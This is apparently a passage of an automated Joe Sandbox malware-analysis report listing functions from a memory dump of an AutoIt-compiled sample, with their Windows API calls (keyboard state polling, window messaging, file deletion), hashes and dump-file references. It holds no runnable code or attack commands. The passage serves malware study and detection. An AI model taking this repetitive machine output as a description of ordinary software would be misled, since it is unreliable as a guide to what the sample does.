                                        • timeGetTime.WINMM ref: 007B809C
                                          • Part of subcall function 0078E3A5: timeGetTime.WINMM(?,7694B400,007E6163), ref: 0078E3A9
                                        • Sleep.KERNEL32(0000000A), ref: 007B80C8
                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 007B80EC
                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007B810E
                                        • SetActiveWindow.USER32 ref: 007B812D
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B813B
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B815A
                                        • Sleep.KERNEL32(000000FA), ref: 007B8165
                                        • IsWindow.USER32 ref: 007B8171
                                        • EndDialog.USER32(00000000), ref: 007B8182
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 5d21b532179e411509b9588a6b4791cacb89345fafc79dda54d161b7b2d4086c
                                        • Instruction ID: f39ab982d022d6fd0a9b6382e739048689855eecbf13f995b596460f4c346099
                                        • Opcode Fuzzy Hash: 5d21b532179e411509b9588a6b4791cacb89345fafc79dda54d161b7b2d4086c
                                        • Instruction Fuzzy Hash: 0B218170200208FFE7226B65EC8DB7A3B6FF7A4389B044518F51182261CF7E8D55CB1A
                                        Function 007B32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007E3C64,00000010,00000000,Bad directive syntax error,0080DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 007B32D1
                                        • LoadStringW.USER32(00000000,?,007E3C64,00000010), ref: 007B32D8
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • _wprintf.LIBCMT ref: 007B3309
                                        • __swprintf.LIBCMT ref: 007B332B
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007B3395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 1506413516-4153970271
                                        • Opcode ID: efb62aa98633f7e65adae52ec8c98d4d287a6772b6113d4c935ecbe9e82fa148
                                        • Instruction ID: 530543139c00f6c4d8cb911f85b0b2a0c8115a72f0f7bb5efc9f60ecaa9e5d45
                                        • Opcode Fuzzy Hash: efb62aa98633f7e65adae52ec8c98d4d287a6772b6113d4c935ecbe9e82fa148
                                        • Instruction Fuzzy Hash: 8E217C3284421AFBCF12EF90DC1AEEE7775FF18740F008415B519A11A2DA7DAB94DB60
                                        Function 007BC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007BC6A0: __time64.LIBCMT ref: 007BC6AA
                                          • Part of subcall function 007741A7: _fseek.LIBCMT ref: 007741BF
                                        • __wsplitpath.LIBCMT ref: 007BC96F
                                          • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
                                        • _wcscpy.LIBCMT ref: 007BC982
                                        • _wcscat.LIBCMT ref: 007BC995
                                        • __wsplitpath.LIBCMT ref: 007BC9BA
                                        • _wcscat.LIBCMT ref: 007BC9D0
                                        • _wcscat.LIBCMT ref: 007BC9E3
                                          • Part of subcall function 007BC6E4: _memmove.LIBCMT ref: 007BC71D
                                          • Part of subcall function 007BC6E4: _memmove.LIBCMT ref: 007BC72C
                                        • _wcscmp.LIBCMT ref: 007BC92A
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF49
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF5C
                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007BCB8D
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007BCC24
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007BCC3A
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007BCC4B
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007BCC5D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                        • String ID:
                                        • API String ID: 152968663-0
                                        • Opcode ID: 817f68c25e0311e8b1eb7068da6f962bf7ae13c299e17c4f4212d310ce148e2e
                                        • Instruction ID: b587d9db2996604d58ac50928c31a294f8cced54a25ce0c45ff572b322e9fdf2
                                        • Opcode Fuzzy Hash: 817f68c25e0311e8b1eb7068da6f962bf7ae13c299e17c4f4212d310ce148e2e
                                        • Instruction Fuzzy Hash: 79C13BB190011DAEDF11DFA4CC85EEEBBBDAF59310F0080AAF609E6151D7789A84CF65
                                        Function 007C08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                        • String ID:
                                        • API String ID: 3566271842-0
                                        • Opcode ID: 31518a075f413ed3d494db8126b46988535073a74245fbd92bb761bc68bd6693
                                        • Instruction ID: 50f9823b6a6639a3960858924925eb2931079b2d5788e6880bd09a1af9a7be97
                                        • Opcode Fuzzy Hash: 31518a075f413ed3d494db8126b46988535073a74245fbd92bb761bc68bd6693
                                        • Instruction Fuzzy Hash: 54711B75A00219EFDB10DFA4C888EDEB7B9FF48354F048099E919AB251D778AE40CB94
                                        Function 007B388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 007B3908
                                        • SetKeyboardState.USER32(?), ref: 007B3973
                                        • GetAsyncKeyState.USER32(000000A0), ref: 007B3993
                                        • GetKeyState.USER32(000000A0), ref: 007B39AA
                                        • GetAsyncKeyState.USER32(000000A1), ref: 007B39D9
                                        • GetKeyState.USER32(000000A1), ref: 007B39EA
                                        • GetAsyncKeyState.USER32(00000011), ref: 007B3A16
                                        • GetKeyState.USER32(00000011), ref: 007B3A24
                                        • GetAsyncKeyState.USER32(00000012), ref: 007B3A4D
                                        • GetKeyState.USER32(00000012), ref: 007B3A5B
                                        • GetAsyncKeyState.USER32(0000005B), ref: 007B3A84
                                        • GetKeyState.USER32(0000005B), ref: 007B3A92
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 0b74ead2873a4b50c408e95dfd126528ca0f5f63b402224da9e1261eb73a1b8a
                                        • Instruction ID: ee3c7ac16eee9a4a0bcc760fc44ace62abfe1711c6d8fa12ee747765d829c571
                                        • Opcode Fuzzy Hash: 0b74ead2873a4b50c408e95dfd126528ca0f5f63b402224da9e1261eb73a1b8a
                                        • Instruction Fuzzy Hash: 8E51F720A047C469FB35EBA488157EABFB45F01740F08858DE5C25A1C3DA5CABCCC772
                                        Function 007AFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 007AFB19
                                        • GetWindowRect.USER32(00000000,?), ref: 007AFB2B
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AFB89
                                        • GetDlgItem.USER32(?,00000002), ref: 007AFB94
                                        • GetWindowRect.USER32(00000000,?), ref: 007AFBA6
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AFBFC
                                        • GetDlgItem.USER32(?,000003E9), ref: 007AFC0A
                                        • GetWindowRect.USER32(00000000,?), ref: 007AFC1B
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AFC5E
                                        • GetDlgItem.USER32(?,000003EA), ref: 007AFC6C
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AFC89
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007AFC96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: cc8439700f8d1f39ef106d73e77880b339cf6d9e3bb602229b9586df8a4efda4
                                        • Instruction ID: b1e5e8cb11daf42294d9ab7affb3dd03fde129112b3d8e142ae0321f8e762092
                                        • Opcode Fuzzy Hash: cc8439700f8d1f39ef106d73e77880b339cf6d9e3bb602229b9586df8a4efda4
                                        • Instruction Fuzzy Hash: F45120B1B00209AFDB18CFA9DD95ABEBBB6EB88351F148229F915D7290D7749D00CB14
                                        Function 0078B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • GetSysColor.USER32(0000000F), ref: 0078B067
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: be84e06afef0e3dbe2b95af7f6ed6a14d5a28cfb7e04e2f2d2605e04ba979bb9
                                        • Instruction ID: b753aabe8f452c8e904b272775f42f136f93d2fa7cdd0142f3f8f8bad27e43e3
                                        • Opcode Fuzzy Hash: be84e06afef0e3dbe2b95af7f6ed6a14d5a28cfb7e04e2f2d2605e04ba979bb9
                                        • Instruction Fuzzy Hash: 2C41A031140548AFDB30AF28DC88BBA3B66AB46731F188265FD758F1E2D7398C41DB25
                                        Function 007B7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                        • String ID:
                                        • API String ID: 136442275-0
                                        • Opcode ID: 79ef8f11be5dbe3a1c5934ed5d57f7a77a5049f6b4bce5060278283f6246b1b6
                                        • Instruction ID: bea29ae2dcf632e7710470ac65920af9867f1465eeb56e155027b201ba218cbf
                                        • Opcode Fuzzy Hash: 79ef8f11be5dbe3a1c5934ed5d57f7a77a5049f6b4bce5060278283f6246b1b6
                                        • Instruction Fuzzy Hash: 7F410EB290416CAADF25EB50DC45EDE73BCAB48310F4041E6B519A2041EB79ABD4CFA0
                                        Function 007784A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                        Download Yara Rule
                                        APIs
                                        • __swprintf.LIBCMT ref: 007784E5
                                        • __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 00792177: _xtow@16.LIBCMT ref: 00792198
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf_xtow@16
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 1502193981-2263619337
                                        • Opcode ID: 6a51bbfbe0c67b796cc97e629d4173f4aaeb6e8e674fd9bfe23e8f617259d7d0
                                        • Instruction ID: 70f63028b55b8981e07701f85f34a1a1876bec0b1f5776d49b65fc1d555037d7
                                        • Opcode Fuzzy Hash: 6a51bbfbe0c67b796cc97e629d4173f4aaeb6e8e674fd9bfe23e8f617259d7d0
                                        • Instruction Fuzzy Hash: 3A413631600649EFDF24DF38E849E6A77E9FF09350F20846EE449C7282EA7D9A51CB11
                                        Function 007B57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007B5816
                                        • GetMenuItemInfoW.USER32(008318F0,000000FF,00000000,00000030), ref: 007B5877
                                        • SetMenuItemInfoW.USER32(008318F0,00000004,00000000,00000030), ref: 007B58AD
                                        • Sleep.KERNEL32(000001F4), ref: 007B58BF
                                        • GetMenuItemCount.USER32(?), ref: 007B5903
                                        • GetMenuItemID.USER32(?,00000000), ref: 007B591F
                                        • GetMenuItemID.USER32(?,-00000001), ref: 007B5949
                                        • GetMenuItemID.USER32(?,?), ref: 007B598E
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B59D4
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B59E8
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B5A09
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                        • String ID:
                                        • API String ID: 4176008265-0
                                        • Opcode ID: 1f067efb1b8db8ffa92c86a8d18240e738ab971f9cee0658d4e01bb8b586f275
                                        • Instruction ID: a76cb626813c4f22042ad7d6ef57e29bcea251d784e6b1b45307e349f23325e5
                                        • Opcode Fuzzy Hash: 1f067efb1b8db8ffa92c86a8d18240e738ab971f9cee0658d4e01bb8b586f275
                                        • Instruction Fuzzy Hash: 8861ACB0900A89EFDF21CFA4C888BFE7BB9EB45358F184159E441A7251D779AD05CB20
                                        Function 007D9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D9AA5
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D9AA8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007D9ACC
                                        • _memset.LIBCMT ref: 007D9ADD
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D9AEF
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D9B67
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: a09fd99f3c9a2f90daa5966640dc15b621b3e75ddfffa0a42fdf593bbfdc1c7b
                                        • Instruction ID: fb372f39d987f52b093c2c66ab92ac957df17574447f83515c6fcd6569ffe60c
                                        • Opcode Fuzzy Hash: a09fd99f3c9a2f90daa5966640dc15b621b3e75ddfffa0a42fdf593bbfdc1c7b
                                        • Instruction Fuzzy Hash: 0E616A71A00208AFDB21DFA4CC85EEE77B8EB49710F10456AFA18E7391D774AD41DBA4
                                        Function 007B3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 007B3591
                                        • GetAsyncKeyState.USER32(000000A0), ref: 007B3612
                                        • GetKeyState.USER32(000000A0), ref: 007B362D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 007B3647
                                        • GetKeyState.USER32(000000A1), ref: 007B365C
                                        • GetAsyncKeyState.USER32(00000011), ref: 007B3674
                                        • GetKeyState.USER32(00000011), ref: 007B3686
                                        • GetAsyncKeyState.USER32(00000012), ref: 007B369E
                                        • GetKeyState.USER32(00000012), ref: 007B36B0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 007B36C8
                                        • GetKeyState.USER32(0000005B), ref: 007B36DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 7d969e521905c711a88b5747b60e13fd25da55619730d5f3568d06dab32a8bd5
                                        • Instruction ID: 597513ac94a017db629e5a9a925a9f7334b88ff24ce05583867ce2fecdb7bfbd
                                        • Opcode Fuzzy Hash: 7d969e521905c711a88b5747b60e13fd25da55619730d5f3568d06dab32a8bd5
                                        • Instruction Fuzzy Hash: 2A4181605087C97DFF319B6488143F5BFA16F11348F488059D9C6462C2EBAC9FD8CBA6
                                        Function 007AA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007AA2AA
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 007AA2F5
                                        • VariantInit.OLEAUT32(?), ref: 007AA307
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 007AA327
                                        • VariantCopy.OLEAUT32(?,?), ref: 007AA36A
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 007AA37E
                                        • VariantClear.OLEAUT32(?), ref: 007AA393
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 007AA3A0
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007AA3A9
                                        • VariantClear.OLEAUT32(?), ref: 007AA3BB
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007AA3C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
